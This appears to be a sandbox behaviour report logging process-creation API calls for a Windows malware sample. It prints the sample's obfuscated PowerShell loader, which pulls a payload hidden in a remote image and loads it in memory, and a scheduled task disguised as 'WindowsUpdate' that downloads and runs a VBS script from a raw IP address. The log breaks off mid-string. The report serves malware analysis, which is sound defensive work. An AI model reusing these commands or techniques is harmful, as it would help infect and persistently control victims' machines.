#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline schtasks /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2072
thread_handle: 0x000002f0
process_identifier: 2068
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f8
1 1 0

CreateProcessInternalW

 thread_identifier: 2120
thread_handle: 0x0000029c
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
filepath_r: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002f8
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
parameters: -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
filepath: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 2516
thread_handle: 0x00000310
process_identifier: 2512
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000318
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$